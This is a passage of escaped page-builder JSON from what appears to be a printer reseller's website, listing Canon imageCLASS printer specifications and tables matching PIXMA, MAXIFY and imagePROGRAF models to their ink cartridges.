7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment 